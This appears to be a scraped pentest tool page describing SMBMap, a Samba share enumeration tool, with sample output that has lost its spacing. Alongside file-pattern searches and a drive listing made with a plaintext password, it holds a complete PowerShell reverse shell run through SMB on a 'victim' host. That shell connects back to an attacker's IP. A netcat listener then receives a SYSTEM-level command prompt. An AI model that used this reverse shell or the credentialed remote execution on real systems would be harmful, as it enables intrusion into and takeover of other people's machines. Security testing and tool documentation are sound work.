[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]No matching patterns foundHost: 192.168.0.89 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]C:\Users\terdf\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JY5MGKVO\salesmaps[1].htmC:\Users\terdf\OldFiles\Cache_2013522\Content.IE5\JY5MGKVO\salesmaps[1].htmHost: 192.168.0.99 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]C:\Users\biffh\AppData\Local\Microsoft\Internet Explorer\DOMStore\L7W17OPZ\static.olark[1].xmlC:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\MIY2POGJ\validation[2].jsC:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\NV1MNBWA\Docs[1].htmC:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\NV1MNBWA\Salesmaps[1].htmDrive Listing:This feature was added to compliment the file content searching feature$ python smbmap.py -H 192.168.1.24 -u Administrator -p ‘R33nisP!nckle’ -L [!] Missing domain…defaulting to WORKGROUP[+] Finding open SMB ports….[+] User SMB session establishd…[+] IP: 192.168.1.24:445 Name: unkown [+] Host 192.168.1.24 Local Drives: C:\ D:\[+] Host 192.168.1.24 Net Drive(s): E: \\vboxsrv\Public VirtualBox Shared FoldersNifty Shell:Run Powershell Script on Victim SMB host (change the IP in the code to your IP addres, i.e where the shell connects back to)$ python smbmap.py -u jsmith -p ‘R33nisP!nckle’ -d ABC -H 192.168.2.50 -x ‘powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length – $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"’ [+] Finding open SMB ports….[+] User SMB session establishd…[+] IP: 192.168.2.50:445 Name: unkown [!] Error encountered, sharing violation, unable to retrieve outputAttackers Netcat Listener:$ nc -l 4445Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoami nt authority\systemDownload SMBMap

Link: http://feedproxy.google.com/~r/PentestTools/~3/zyZB2g5xxOU/smbmap-samba-share-enumeration-tool.html